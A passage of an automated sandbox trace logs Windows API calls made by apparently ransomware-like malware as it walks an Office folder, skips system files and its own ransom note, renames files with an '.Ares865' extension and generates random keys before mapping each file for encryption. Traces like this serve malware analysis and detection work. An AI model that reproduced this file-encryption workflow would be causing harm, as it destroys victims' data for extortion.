0x2d9d88 [0067.235] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.235] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0067.235] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.235] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.236] CloseHandle (hObject=0x154) returned 1 [0067.236] CloseHandle (hObject=0x15c) returned 1 [0067.236] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.236] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.236] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.236] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d76700, ftCreationTime.dwHighDateTime=0x1c5ee67, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x99d76700, ftLastWriteTime.dwHighDateTime=0x1c5ee67, nFileSizeHigh=0x0, nFileSizeLow=0x1b7ebe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BIZFORM.DPV", cAlternateFileName="")) returned 1 [0067.236] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.236] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2="aoldtz.exe") returned 1 [0067.236] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2=".") returned 1 [0067.236] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2="..") returned 1 [0067.236] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2="windows") returned -1 [0067.236] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2="bootmgr") returned -1 [0067.236] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2="temp") returned -1 [0067.236] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2="pagefile.sys") returned -1 [0067.236] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2="boot") returned -1 [0067.236] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2="ids.txt") returned -1 [0067.236] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2="ntuser.dat") returned -1 [0067.236] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2="perflogs") returned -1 [0067.236] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2="MSBuild") returned -1 [0067.236] lstrlenW (lpString="BIZFORM.DPV") returned 11 [0067.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BIZCARD.XML") returned 61 [0067.236] lstrcpyW (in: lpString1=0x2e2e8c4, lpString2="BIZFORM.DPV" | out: lpString1="BIZFORM.DPV") returned="BIZFORM.DPV" [0067.236] lstrlenW (lpString="BIZFORM.DPV") returned 11 [0067.236] lstrlenW (lpString="Ares865") returned 7 [0067.237] lstrcmpiW (lpString1="ORM.DPV", lpString2="Ares865") returned 1 [0067.237] lstrlenW (lpString=".dll") returned 4 [0067.237] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2=".dll") returned 1 [0067.237] lstrlenW (lpString=".lnk") returned 4 [0067.237] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2=".lnk") returned 1 [0067.237] lstrlenW (lpString=".ini") returned 4 [0067.237] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2=".ini") returned 1 [0067.237] lstrlenW (lpString=".sys") returned 4 [0067.237] lstrcmpiW (lpString1="BIZFORM.DPV", lpString2=".sys") returned 1 [0067.237] lstrlenW (lpString="BIZFORM.DPV") returned 11 [0067.237] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BIZFORM.XML.Ares865") returned 69 [0067.237] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BIZFORM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\bizform.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BIZFORM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\bizform.xml.ares865"), dwFlags=0x1) returned 1 [0067.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BIZFORM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\bizform.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0067.238] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=68166) returned 1 [0067.238] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.238] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.239] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.239] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.239] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.239] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.239] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10d50, lpName=0x0) returned 0x154 [0067.241] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10d50) returned 0x190000 [0067.244] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.245] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.245] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.245] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.245] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.245] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.245] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.246] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.246] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.246] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0067.246] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.246] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0067.246] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.246] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.247] CloseHandle (hObject=0x154) returned 1 [0067.247] CloseHandle (hObject=0x15c) returned 1 [0067.247] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.247] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.247] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.247] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e02aa00, ftCreationTime.dwHighDateTime=0x1c9c882, ftLastAccessTime.dwLowDateTime=0x51a3b970, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2e02aa00, ftLastWriteTime.dwHighDateTime=0x1c9c882, nFileSizeHigh=0x0, nFileSizeLow=0xf0ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BORDERBB.DPV", cAlternateFileName="")) returned 1 [0067.247] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.247] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2="aoldtz.exe") returned 1 [0067.247] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2=".") returned 1 [0067.247] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2="..") returned 1 [0067.247] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2="windows") returned -1 [0067.247] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2="bootmgr") returned 1 [0067.247] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2="temp") returned -1 [0067.247] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2="pagefile.sys") returned -1 [0067.248] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2="boot") returned 1 [0067.248] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2="ids.txt") returned -1 [0067.248] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2="ntuser.dat") returned -1 [0067.248] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2="perflogs") returned -1 [0067.248] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2="MSBuild") returned -1 [0067.248] lstrlenW (lpString="BORDERBB.DPV") returned 12 [0067.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BIZFORM.XML") returned 61 [0067.248] lstrcpyW (in: lpString1=0x2e2e8c4, lpString2="BORDERBB.DPV" | out: lpString1="BORDERBB.DPV") returned="BORDERBB.DPV" [0067.248] lstrlenW (lpString="BORDERBB.DPV") returned 12 [0067.248] lstrlenW (lpString="Ares865") returned 7 [0067.248] lstrcmpiW (lpString1="RBB.DPV", lpString2="Ares865") returned 1 [0067.248] lstrlenW (lpString=".dll") returned 4 [0067.248] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2=".dll") returned 1 [0067.248] lstrlenW (lpString=".lnk") returned 4 [0067.248] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2=".lnk") returned 1 [0067.248] lstrlenW (lpString=".ini") returned 4 [0067.248] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2=".ini") returned 1 [0067.248] lstrlenW (lpString=".sys") returned 4 [0067.248] lstrcmpiW (lpString1="BORDERBB.DPV", lpString2=".sys") returned 1 [0067.248] lstrlenW (lpString="BORDERBB.DPV") returned 12 [0067.248] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BROCHURE.XML.Ares865") returned 70 [0067.248] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BROCHURE.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\brochure.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BROCHURE.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\brochure.xml.ares865"), dwFlags=0x1) returned 1 [0067.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BROCHURE.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\brochure.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0067.250] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=30074) returned 1 [0067.250] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.250] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.250] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.250] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.251] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.251] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.251] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7880, lpName=0x0) returned 0x154 [0067.253] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7880) returned 0x190000 [0067.254] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.255] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.255] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.255] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.255] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0067.255] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.256] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0067.256] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.256] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.256] CloseHandle (hObject=0x154) returned 1 [0067.256] CloseHandle (hObject=0x15c) returned 1 [0067.256] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.256] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.256] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.256] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd991aa00, ftCreationTime.dwHighDateTime=0x1c4a10f, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd991aa00, ftLastWriteTime.dwHighDateTime=0x1c4a10f, nFileSizeHigh=0x0, nFileSizeLow=0xa28, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BS2BARB.POC", cAlternateFileName="")) returned 1 [0067.256] lstrcmpiW (lpString1="BS2BARB.POC", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.256] lstrcmpiW (lpString1="BS2BARB.POC", lpString2="aoldtz.exe") returned 1 [0067.256] lstrcmpiW (lpString1="BS2BARB.POC", lpString2=".") returned 1 [0067.256] lstrcmpiW (lpString1="BS2BARB.POC", lpString2="..") returned 1 [0067.256] lstrcmpiW (lpString1="BS2BARB.POC", lpString2="windows") returned -1 [0067.257] lstrcmpiW (lpString1="BS2BARB.POC", lpString2="bootmgr") returned 1 [0067.257] lstrcmpiW (lpString1="BS2BARB.POC", lpString2="temp") returned -1 [0067.257] lstrcmpiW (lpString1="BS2BARB.POC", lpString2="pagefile.sys") returned -1 [0067.257] lstrcmpiW (lpString1="BS2BARB.POC", lpString2="boot") returned 1 [0067.257] lstrcmpiW (lpString1="BS2BARB.POC", lpString2="ids.txt") returned -1 [0067.257] lstrcmpiW (lpString1="BS2BARB.POC", lpString2="ntuser.dat") returned -1 [0067.257] lstrcmpiW (lpString1="BS2BARB.POC", lpString2="perflogs") returned -1 [0067.257] lstrcmpiW (lpString1="BS2BARB.POC", lpString2="MSBuild") returned -1 [0067.257] lstrlenW (lpString="BS2BARB.POC") returned 11 [0067.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BROCHURE.XML") returned 62 [0067.257] lstrcpyW (in: lpString1=0x2e2e8c4, lpString2="BS2BARB.POC" | out: lpString1="BS2BARB.POC") returned="BS2BARB.POC" [0067.257] lstrlenW (lpString="BS2BARB.POC") returned 11 [0067.257] lstrlenW (lpString="Ares865") returned 7 [0067.257] lstrcmpiW (lpString1="ARB.POC", lpString2="Ares865") returned -1 [0067.257] lstrlenW (lpString=".dll") returned 4 [0067.257] lstrcmpiW (lpString1="BS2BARB.POC", lpString2=".dll") returned 1 [0067.257] lstrlenW (lpString=".lnk") returned 4 [0067.257] lstrcmpiW (lpString1="BS2BARB.POC", lpString2=".lnk") returned 1 [0067.257] lstrlenW (lpString=".ini") returned 4 [0067.257] lstrcmpiW (lpString1="BS2BARB.POC", lpString2=".ini") returned 1 [0067.257] lstrlenW (lpString=".sys") returned 4 [0067.257] lstrcmpiW (lpString1="BS2BARB.POC", lpString2=".sys") returned 1 [0067.257] lstrlenW (lpString="BS2BARB.POC") returned 11 [0067.257] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CALENDAR.XML.Ares865") returned 70 [0067.257] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CALENDAR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\calendar.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CALENDAR.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\calendar.xml.ares865"), dwFlags=0x1) returned 1 [0067.259] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CALENDAR.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\calendar.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0067.259] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=9748) returned 1 [0067.259] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.259] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.259] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.259] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.260] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.260] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.260] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2920, lpName=0x0) returned 0x154 [0067.262] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2920) returned 0x190000 [0067.263] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.264] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.264] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0067.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0067.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.264] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.265] CloseHandle (hObject=0x154) returned 1 [0067.265] CloseHandle (hObject=0x15c) returned 1 [0067.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.265] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1e9e500, ftCreationTime.dwHighDateTime=0x1c4a10f, ftLastAccessTime.dwLowDateTime=0x60120f70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe1e9e500, ftLastWriteTime.dwHighDateTime=0x1c4a10f, nFileSizeHigh=0x0, nFileSizeLow=0x329e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CALHM.POC", cAlternateFileName="")) returned 1 [0067.265] lstrcmpiW (lpString1="CALHM.POC", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.265] lstrcmpiW (lpString1="CALHM.POC", lpString2="aoldtz.exe") returned 1 [0067.265] lstrcmpiW (lpString1="CALHM.POC", lpString2=".") returned 1 [0067.265] lstrcmpiW (lpString1="CALHM.POC", lpString2="..") returned 1 [0067.265] lstrcmpiW (lpString1="CALHM.POC", lpString2="windows") returned -1 [0067.265] lstrcmpiW (lpString1="CALHM.POC", lpString2="bootmgr") returned 1 [0067.265] lstrcmpiW (lpString1="CALHM.POC", lpString2="temp") returned -1 [0067.265] lstrcmpiW (lpString1="CALHM.POC", lpString2="pagefile.sys") returned -1 [0067.265] lstrcmpiW (lpString1="CALHM.POC", lpString2="boot") returned 1 [0067.265] lstrcmpiW (lpString1="CALHM.POC", lpString2="ids.txt") returned -1 [0067.266] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CATALOG.XML.Ares865") returned 69 [0067.266] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CATALOG.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\catalog.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CATALOG.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\catalog.xml.ares865"), dwFlags=0x1) returned 1 [0067.267] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CATALOG.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\catalog.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0067.267] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=7766) returned 1 [0067.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.268] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.268] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.268] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.268] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.268] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.269] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2160, lpName=0x0) returned 0x154 [0067.270] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2160) returned 0x190000 [0067.271] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.272] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.272] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.272] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.272] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.272] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.272] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.272] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.272] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.272] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0067.272] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.272] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0067.272] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.272] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.275] CloseHandle (hObject=0x154) returned 1 [0067.275] CloseHandle (hObject=0x15c) returned 1 [0067.275] HeapFree (in: hHeap=0x2b0000, 